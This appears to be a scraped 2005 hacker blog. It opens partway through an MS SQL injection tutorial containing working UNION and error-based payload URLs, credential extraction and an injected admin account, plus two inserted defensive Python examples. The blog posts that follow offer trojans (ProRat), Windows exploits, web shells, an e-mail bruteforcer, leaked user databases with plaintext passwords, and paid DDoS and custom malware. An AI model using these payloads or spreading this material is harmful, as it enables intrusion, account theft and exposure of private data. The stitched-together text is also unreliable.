    /index.asp, line 5

    The matching pattern, '%25login%25', will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

    6.1 How to mine all column names of a table?
    We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all column names of a table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
    /index.asp, line 5

    Now that we have the first column name, we can use NOT IN () to get the next column name:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
    /index.asp, line 5

    Continuing further, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when we get the following error message:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
    /index.asp, line 5

    6.2 How to retrieve any data we want?
    Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

    Now, let's get the first login_name from the "admin_login" table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
    /index.asp, line 5

    We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
    /index.asp, line 5

    We can now login as "neo" with his password "m4trix".

    6.3 How to get numeric string value?
    There is a limitation to the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters between 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

    We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

    To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

    We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b). We append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. When we manually call the convert() function to convert '31173 morpheus' into an integer, SQL Server throws an ODBC error message:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
    /index.asp, line 5

    Now, you can even login as 'trinity' with the password '31173'.

    7.0 How to update/insert data into the database?
    When we have successfully gathered all column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":

    http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

    To INSERT a new record into the database:

    http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

    We can now login as "neo2" with the password of "newpas5".
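Seen from the defender's side, the requests built in sections 3.0 to 7.0 leave recognisable shapes in the web server log. The following Python log scanner is an added example, not part of the original article: it percent-decodes each query string and flags those shapes. The log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (date time method url status); not from the article.
SAMPLE_LOG = """\
2005-08-15 10:01:02 GET /index.asp?id=10 200
2005-08-15 10:01:09 GET /index.asp?category=food'%20or%201=1-- 200
2005-08-15 10:01:30 GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
2005-08-15 10:02:11 GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20convert(int,%20password%2b'%20morpheus')%20FROM%20admin_login-- 500
2005-08-15 10:02:40 GET /index.asp?id=10';%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'-- 500
2005-08-15 10:03:00 GET /search.asp?q=union%20station%20hotels 200
"""

# Hypothetical rule names, one per request shape shown in the walkthrough.
RULES = [
    # quote, then OR <value>=<value>  (sections 3.0 and 3.1)
    ("tautology", re.compile(
        r"""['"]\s*\)?\s*or\s+\(?\s*['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    # UNION SELECT appended to a parameter (section 6.0)
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # schema enumeration through INFORMATION_SCHEMA (sections 6.0 and 6.1)
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    # forced conversion to int to provoke an error (section 6.3)
    ("forced_cast", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    # stacked statement or the stored procedures named in 4.0 and 5.0
    ("stacked_proc", re.compile(r";\s*exec\b|\bxp_cmdshell\b|\bsp_makewebtask\b", re.I)),
    # trailing SQL comment that swallows the rest of the query
    ("comment_tail", re.compile(r"--\s*$")),
]


def classify(raw_query):
    """Percent-decode one query string once and return the names of matching rules."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(log_text):
    """Return (line_no, path, status, rules) for requests that trip a content rule.

    comment_tail alone is too noisy to alert on, so it only counts as
    supporting evidence next to another rule.
    """
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) != 5:
            continue  # not in the assumed five-field format
        url, status = fields[3], int(fields[4])
        parts = urlsplit(url)
        rules = classify(parts.query)
        if any(rule != "comment_tail" for rule in rules):
            hits.append((line_no, parts.path, status, rules))
    return hits


def severity(hit):
    """A 5xx reply to a UNION/convert/exec probe means the database raised an
    error on attacker-shaped input, which is what section 6 relies on."""
    _, _, status, rules = hit
    strong = {"union_select", "forced_cast", "stacked_proc"}
    return "high" if status >= 500 and strong & set(rules) else "review"


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(severity(hit), hit)
```

Signatures like these are a tripwire for triage; they do not replace fixing the query construction in the application.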

    8.0 How to avoid SQL Injection?
    Filter out characters like single quote, double quote, slash, back slash, semi colon, extended characters like NULL, carriage return, new line, etc., in all strings from:
    - Input from users
    - Parameters from URL
    - Values from cookie

    For a numeric value, convert it to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer.

    Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

    Delete stored procedures that you are not using like:

    master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
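The ASP snippet from section 3.1 next to a bound-parameter version, plus the integer check from section 8.0, as an added example that is not part of the original article. It assumes Python's sqlite3 module as a stand-in for MS SQL Server; the PName and id columns, the sample rows and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the walkthrough's 'product' table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE product (id INTEGER PRIMARY KEY, PName TEXT, PCategory TEXT)")
    conn.executemany(
        "INSERT INTO product (id, PName, PCategory) VALUES (?, ?, ?)",
        [(10, "bread", "food"), (11, "cheese", "food"),
         (12, "hammer", "tools"), (13, "internal price list", "hidden")],
    )
    return conn


def by_category_concat(conn, v_cat):
    """Same pattern as the ASP snippet: the input is pasted into the SQL text."""
    sqlstr = "SELECT PName FROM product WHERE PCategory='" + v_cat + "'"
    return sorted(row[0] for row in conn.execute(sqlstr))


def by_category_bound(conn, v_cat):
    """Hardened: the SQL text is constant and the value travels as a bound parameter."""
    rows = conn.execute("SELECT PName FROM product WHERE PCategory = ?", (v_cat,))
    return sorted(row[0] for row in rows)


def parse_id(raw):
    """Section 8.0's numeric rule: accept plain decimal digits only, then convert."""
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("id must be a short decimal integer")
    return int(raw)


def by_id(conn, raw_id):
    """Return (status, body); database error text is never echoed to the client."""
    try:
        row = conn.execute(
            "SELECT PName FROM product WHERE id = ?", (parse_id(raw_id),)).fetchone()
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        # Log the detail server-side; section 6 depends on it reaching the browser.
        return 500, "Internal error"
    return (200, row[0]) if row else (404, "Not found")


if __name__ == "__main__":
    db = make_db()
    for value in ("food", "food' or 1=1--", "food' or 'a'='a"):
        print(repr(value))
        print("  concatenated:", by_category_concat(db, value))
        print("  bound       :", by_category_bound(db, value))
    union_probe = "10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--"
    print(by_id(db, "10"), by_id(db, union_probe))
```

With bound parameters the SQL text never changes, so the result does not depend on the character filter above catching every quote or encoding.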


    9.0 Where can I get more info?
    One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
    http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

    Great article on gathering information from ODBC error messages:
    http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

    A good summary of SQL Injection on various SQL Servers:
    http://www.owasp.org/asac/input_validation/sql.shtml

    Sensepost's article on reading SQL Injection:
    http://www.sensepost.com/misc/SQLinsertion.htm

    Other worthwhile reading:
    http://www.digitaloffense.net/wargames01/IOWargames.ppt
    http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
    http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
    http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

    IGC SE 1.01



    A good alternative to the famous ICQ, and at the moment a much more secure alternative.

    You can read more and get the pager itself at: www.igchat.com

    Sunday, August 14, 2005

    ProRat 1.9 Special Edition




    I suppose the "godfather" from NetSec.lv can be forgiven for mistakenly posting the public version instead of 1.6 SE. As far as I know, trojan horses like this are of little interest to him anyway.
    The latest public release is ProRat v1.9 Fix2, and it can be downloaded for free from the author's site, along with the corresponding help/language files.
  • here


  • But I will post ProRat 1.9 SE for you (the latest release is 2.0)
  • here



  • As for downloads from the email.su server: if it does not let you, feel free to try again later; it is simply more convenient for me this way.

    If you are interested in any other popular or less popular trojans/keyloggers, feel free to say so in the comments.

    Google Hacker by dav

    A small, simple tool with ready-made Google commands; it will probably come in handy for someone.


  • here

    (MS05-039) exploit

    I completely forgot to mention the second exploit, for Windows

    (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
    Universal Exploit + no crash shellcode

  • here

    Free shell providers

    http://sdf.lonestar.org
    http://atlantis.neoxys.org/
    http://www.chules.net/
    http://shells.oceanius.com/
    http://www.grex.org/
    http://www.nyx.net/
    http://m-net.arbornet.org/
    http://www.vectorstar.net/
    http://www.polarhome.com/
    http://vmsbox.cjb.net/
    http://www.titanix.net/
    http://nic-nac-project.de/
    http://deathrow.vistech.net/
    http://www.bur.st/
    http://aragon.marway.org/
    http://www.magnesium.net/
    http://www.65535.net/
    http://www.unixdaemons.com/
    http://shells.thinkgeek.co.uk/
    http://freeshell.celuloza.ro/
    http://www.silenceisdefeat.org/
    http://phynix.darkwired.org/
    http://www.zsuatt.org/
    http://www.rulex.net/
    http://www.aeshells.org/
    http://the1.no-ip.com/
    http://www.themlg.net/
    http://www.shellsnet.org/
    http://bsd.miki.eu.org/
    http://www.ductape.net/
    http://www.xox.pl/
    http://www.iprotection.com/
    http://www.marmoset.net/
    http://www.bru-noc.net/
    http://www.flame.org/
    http://www.takiweb.com/
    http://www.rootshell.be/
    http://www.daforest.org/

    A few CGI vulnerabilities + 2 webshells

    A few holey sites with .cgi vulnerabilities, with the possibility of executing *nix commands.

    and 2 webshells for your personal needs.

    Deleted

    IE COM Objects Instantiation Exploit (MS05-038)

    A couple of days ago a new exploit for IE came out; it works on 5.01, 5.5, 6.x.

    here

    Ebay.com source


    I have not run it myself, but I was told it is the full source; who knows, take a look yourselves.
    How you will use it and how you will answer for the consequences, I hardly need to tell you; you know it all yourselves.
    here
    archive password:
    www.pridels.blogspot.com

    DC++/no.lv turbo LOL


    LOL

    In any case, if that was Salvis himself, then I am at a loss for words to describe such "carelessness".

    21000+ user database

    This time I will introduce you to another script: for when we cannot find phpMyAdmin or something similar to browse, as in this case, a user database, the RST guys have baked up a fairly handy MySQL script; you can download it: here

    A live example is the edonkeyargentina.com.ar MySQL database with 21000+ users; lovers of ICQ numbers will surely find quite a bit of work there.
    Taking a quick look I noticed that ICQ is popular with them, so here are the first ones that came to hand:
    here

    Saturday, August 13, 2005

    DeFaced E-zine n° 8 released!

    Underground reading; sometimes there is something interesting:

    here

    The magazine's previous issues 1-7 can be obtained here.
    here

    Anonymous FTP connect through web interface

    The PHP script itself was baked by the guys from the NST team.

    I threw it onto a pr0n server so that you can test it; how long it stays there depends on you.

    Deleted

    Par avipreview / about avipreview

    Because Avipreview.com has for a long time been distributing trojans, I went and made a redirect to my blog to warn you, reader, that the program they offer contains a trojan horse.
    I would hardly act this way if I thought the webmasters were not at fault, but I strongly doubt that the webmasters are blameless, because the trojan horse has been bundled for about 1 month already.
    So feel free to look for an alternative source from which you can download their program.


    Dear reader, if you came to my blog because you were redirected from avipreview.com, that means you must read the following text:

    For the last month until now, avipreview.com has had a trojan horse added to their program, and it was available for public download; maybe you were one of those who downloaded it.
    That is why I made the redirect to my blog, to draw attention to that.
    To get a trojan-free avipreview version, please search alternative download sites.

    Earthlink.net whacker - [Earthlink.net e-mail cracker]



    Just as there are special ones for yahoo/hotmail, where ordinary bruters get you nowhere, Earthlink also needs a special bruter; this one does not work very fast, but it does the job.

    here

    About the blog.

    Yesterday I quickly "baked" this blog; as far as my free time and desire allowed, I introduced you a little to the upcoming content of this blog, which is why posts were thrown up quickly one after another so that it would not look so empty. Of course, feel free to mail me with ideas/suggestions/remarks/threats/wishes/etc.
    Likewise, if anyone is interested in being one of this blog's authors, feel free to look at the following requirements.

    1. A desire to write/publish/etc.
    2. A willingness to devote at least 30 minutes a day to the blog.
    3. The ability to share useful information with others.
    4. Courage.
    5. The ability to think alike and understand the current idea of the blog.

    web shellz

    So that this is not just idle chatter, I will give you one web shell for general education. Why only one?
    If I gave 100 or 1000, it would no longer be about education, and on top of that all sorts of smart alecks would turn up who would manage to repost it and shout about what super-uber-hax0rs they are, or would index a page and rejoice.
    This is a simple remview script, publicly available 4 free at http://php.spb.ru/remview/
    There are many of these, 4 free and paid; some have fewer functions, others more. The main thing is that you can walk freely around the server; if you lack permissions, that is your problem, not mine.

    Deleted

    25000+ webmaster accounts

    The database was taken from wwwtoolz.com; it includes first name, last name, login, passwords, e-mail, website, etc.
    The main thing is that the pwd are in plain txt format.

    here

    The database is packed in a .zip archive with a password on it, so that every outsider does not earn medals; you will have to deal with the password yourselves. If the archive password causes big problems, my mail is r0t3d3vil at email.su

    PS. The database is provided for educational purposes only (for example, for supplementing your wordlist; for defaces and other nonsense you answer yourselves).

    Network Security Bible Jan 2005

    Nothing new, but surely someone will want to read it.


    here

    One more ebookz - HACKERS BLACK BOOK 2003 Edition

    An easy-to-read novel: 3.94 Mb

    here

    eBookZ- 4 dummies [w4r3z]

    A few e-books for beginners, and not only for them.


    RFID For Dummies
    Home.Networking.For.Dummies.Third.Edition.Apr.2005
    A+.Certification.for.Dummies.,.3rd.Edition
    Adobe.Illustrator.10.For.Dummies
    AutoCAD.2004.For.Dummies
    Buying.A.Computer.For.Dummies.2004.Edition
    C++.for.Dummies.5th.Edition
    Firewalls.For.Dummies.Second.Edition
    Java.Game.Programming.For.Dummies
    John.Wiley.And.Sons.Statistics.For.Dummies
    Macromedia.Studio.MX.2004.For.Dummies
    John.Wiley.&.Sons.3ds.max.5.for.Dummies
    Wiley.-.Windows.Server.2003.For.Dummies
    Java.All-In-One.Desk.Reference.For.Dummies.Apr.2005
    Adobe Premiere Elements for Dummies
    Creating Family Web Sites For Dummies
    HDTV For Dummies
    JavaScript for Dummies
    Investing Online for Dummies
    Poker for Dummies (password if any: www.AvaxHome.ru)
    Hacking For Dummies
    Europe For Dummies (Dummies Travel) (PASSWORD: o0o|o0o(.)(e)(b)(0)(0)(k)(z)(.)o0o|o0o)
    For Dummies Visual C++ 6 For Dummies Quick Reference
    Car Hacks and Mods for Dummies
    Photoshop CS All-in-One Desk Reference for Dummies
    Cleaning & Stain Removal for Dummies (For Dummies)
    autocad 2005 for dummies
    Troubleshooting your PC Feb 2005
    Creating Webpages
    Adobe.Illustrator.10.For.Dummies
    Photoshop CS2 For Dummies (For Dummies (Computer/Tech))
    Red Hat Linux Fedora for Dummies
    Photoshop CS2 For Dummies mirror (Passw: Mat.Riks.Info)
    Beginning Programming With Java for Dummies (For Dummies (Computer/Tech))
    Nancy Stevenson, WebEx Web Meetings For Dummies
    Visual C++6 for Dummies (password: Mat.Riks.Info)
    The Everyday Internet All-in-One Desk Reference For Dummies (Password: ebooksclub.org)
    Buzz Marketing with Blogs For Dummies
    Starting an Online Business for Dummies (Password: www.AvaxHome.ru)
    Search Engine Optimization for Dummies
    Blocking Spam and Spyware For Dummies (pass: www.hotddls.com)
    IpodForDummies (password: www.hotddls.com)
    Piano for Dummies (Password: ebooksclub.tk)

    FTP$kaz

    Nothing special, for educational purposes only.

    Deleted

    The LV network



    A couple of torrent trackers, 1.5 warez sites, 1 sec. site that by some miracle still exists.
    What gets me is that 99% of LV people hang out either in .RU or elsewhere in the world.
    3 times a year you can spot some deface along the lines of "Andris, it's your own fault, pay back the debt!"
    Or Latvian uber-envy: people crap on each other however they can in the hope of becoming better.
    Just because someone does what you do not do (unwilling or unable) does not mean that person is doing wrong and you are doing right.
    And if you do not bow as expected and say "quu" 3 times, then you are completely screwed.

    Services.

    DDOS - first day 300$, following days 200$; if more than a week, then the daily price is 150$.

    Trojan horses and keyloggers to order; modification of an already finished product to your wishes is also possible.

    0-dayz exploits, likewise to order.


    r0t3d3vil at email.su

    Friday, August 12, 2005

    Bruteforce Cat 2.0


    ICQ numbers

    ICQ numbers: I have dropped a few samples here, of course without the owners' knowledge; those who need them take the number they need, those who do not move on or check the passwords.
    This is only the beginning; I plan to regularly drop in hack/crack freebies that are of no interest to me (shells, e-mails, ftp and other accounts)


    Deleted

    Introduction and rules.

    This blog does not conform to any norms or laws, and the idea behind its creation is personal spiritual self-improvement.
    The blog will be available to you until the moment the law-enforcement authorities or the hoster shut it down.
    You yourselves answer for the consequences of using the information available on this blog; nobody made you come here or use anything.
    The blog owner, as well as the hoster, takes no responsibility for the consequences arising from what is posted on the blog.
    This is a private undertaking!


    Pridels

     
    Copyright (c) 2006 Pridels Sec Crew